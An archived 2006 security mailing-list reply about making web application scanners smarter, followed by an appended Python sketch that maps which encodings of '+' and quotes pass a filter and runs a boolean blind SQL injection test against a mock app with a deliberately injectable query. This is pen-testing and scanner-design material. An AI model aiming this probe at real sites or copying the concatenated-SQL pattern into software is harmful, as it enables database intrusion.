Dailydave mailing list archives
Re: bugs are bad.
From: "Matthew Franz" <mdfranz () gmail com>
Date: Tue, 1 Aug 2006 11:51:07 -0500
Hi Matthew, I have to agree with you there. Most folks run the automated scanners (Nessus, retina, webinspect, appscan, etc.) and then spend the majority of their time trapping requests and manually attempting injects or overflows. The problem is that the application scanner doesn't really gather and use information that would be useful for *further* automation.

For example, if you're testing a blind sql injection, it isn't enough to send a "+AND+1=1" and see if the page returned is the same as the page where the bogus data wasn't sent. It'd be nice to know if the application accepts the '+' sign. And, if it doesn't accept the '+' sign, is it due to a script running within the browser (like RegularExpressionValidator), or a server-side parsing? If the former, you can (and should) still attempt to inject via manual POSTs. If the latter, then the automated scanner should attempt other encoding options to see what permutations of the '+' sign are allowed (and where). And, there are hundreds of these cases which could be built and automated.

If you gather this sort of knowledge, it should mean that the manual 'trap and modify' pen-testing gets minimized (or at least lessened). And, if I'm paying thousands of bucks for a web application scanner (not to be confused with a general network scanner) then this is the sort of data that I want. Heck, I'd even like to see a table of code inputs and what dangerous chars (and their encoding) were allowed, size restrictions, etc. *That* would be freaking useful.
The other thing I'd like to see in commercial products is mining information from server configuration and feeding that into a scanner. For example on J2EE apps you've got a wealth of info sprinkled across dozens of XML config files. Struts-based apps also have juicy stuff about forms, variables, types, and validation mechanisms that could drive specific tests, much of which will be in the .war. I assume there is comparable stuff on the Microsoft platform...

- mdf
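Added example, not code from the thread or from either poster: a Python sketch of the two pieces of automation the quoted message asks for, the "which dangerous chars, in which encodings, does the server let through" table and the boolean blind-injection differential that only makes sense once you know which separator is accepted. The target is a constructed stand-in (`mock_app`, an in-memory SQLite table behind a one-round URL decode and a literal-only blacklist); its filter, the rejection text, the token list and the encoding names are all assumptions made for the example. Because the probe sends requests directly, any rejection it observes is server-side by construction; a browser-only validator never enters the picture, which is the distinction the message draws.

```python
import re
import sqlite3
from urllib.parse import quote, unquote

# ---- Constructed stand-in for the target (hypothetical, not a real product) ----
# One round of URL decoding (as a web server does), then a naive blacklist on the
# decoded value, then string concatenation into SQL.  The single decode and the
# literal-only blacklist are the two properties the probe below is meant to map.
BLACKLIST = re.compile(r"[+']|--")
REJECT_BODY = "Invalid input"

_db = sqlite3.connect(":memory:")
_db.executescript(
    "CREATE TABLE items(id INTEGER, name TEXT);"
    "INSERT INTO items VALUES (1, 'widget'), (2, 'gadget');"
)

def mock_app(raw_value: str):
    """Handle GET /item?id=<raw_value>; return (status, body)."""
    decoded = unquote(raw_value)
    if BLACKLIST.search(decoded):
        return 400, REJECT_BODY
    try:
        rows = _db.execute("SELECT name FROM items WHERE id = " + decoded).fetchall()
    except sqlite3.Error:
        return 500, "Database error"
    return 200, "Item: " + (rows[0][0] if rows else "not found")

# ---- Scanner side ----
def encodings(token: str) -> dict:
    """Candidate encodings of one token, in the order a scanner would try them."""
    url = quote(token, safe="")
    return {
        "raw": token,
        "url": url,
        "double_url": quote(url, safe=""),
        "html_entity": "".join(f"&#{ord(c)};" for c in token),
    }

def probe_encodings(send, tokens, benign="1", reject_body=REJECT_BODY):
    """Build the 'allowed chars and encodings' table.

    'Accepted' means only that the server-side input filter did not reject the
    value; a 500 still counts, because the value reached the backend.  What the
    backend then made of it (e.g. a double-encoded '+' arriving as '%2B') is a
    separate question that the blind test below answers."""
    table = {}
    for tok in tokens:
        table[tok] = {}
        for name, enc in encodings(tok).items():
            status, body = send(benign + enc)
            table[tok][name] = status != 400 and reject_body not in body
    return table

def boolean_blind(send, base, sep):
    """Boolean-based blind differential: base<sep>AND<sep>1=1 must render like the
    untouched page, and base<sep>AND<sep>1=2 must differ.  `sep` is whichever
    separator encoding the probe reported as accepted; the thread's "+AND+1=1"
    silently assumes '+' is, which is exactly the assumption to check first."""
    baseline = send(base)
    true_page = send(base + sep + "AND" + sep + "1=1")
    false_page = send(base + sep + "AND" + sep + "1=2")
    return true_page == baseline and false_page != baseline

def accepted_separator(send, candidates=(" ", "%20", "+", "%2B", "/**/")):
    """First separator encoding for which the blind test succeeds, else None."""
    for sep in candidates:
        if boolean_blind(send, "1", sep):
            return sep
    return None

if __name__ == "__main__":
    for tok, row in probe_encodings(mock_app, ["+", "'", " "]).items():
        print(repr(tok), {k: ("allowed" if v else "blocked") for k, v in row.items()})
    print("usable separator:", repr(accepted_separator(mock_app)))
```

Against the stand-in, raw and single-URL-encoded `+` and `'` are blocked while the double-encoded forms pass the filter (the server decodes once, so the backend sees `%2B`), and the blind differential succeeds with a space or `%20` but fails with `+`. Swapping `mock_app` for a function that performs a real HTTP request and returns `(status, body)` turns the same two functions into the scanner feature the message describes, with the baseline comparison and the rejection fingerprint being the parts you would tune per target.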
Current thread:
- bugs are bad. Dave Aitel (Jul 31)
- Re: bugs are bad. Jared DeMott (Jul 31)
- Re: bugs are bad. Matthew Franz (Aug 01)
- Message not available
- Re: bugs are bad. Matthew Franz (Aug 01)
- Re: bugs are bad. John Lampe (Aug 01)
- Re: bugs are bad. foofus (Aug 01)
- Re: bugs are bad. John Lampe (Aug 01)
- Re: bugs are bad. Matthew Franz (Aug 01)
- Re: bugs are bad. Jared DeMott (Jul 31)
- Re: bugs are bad. John Lampe (Aug 01)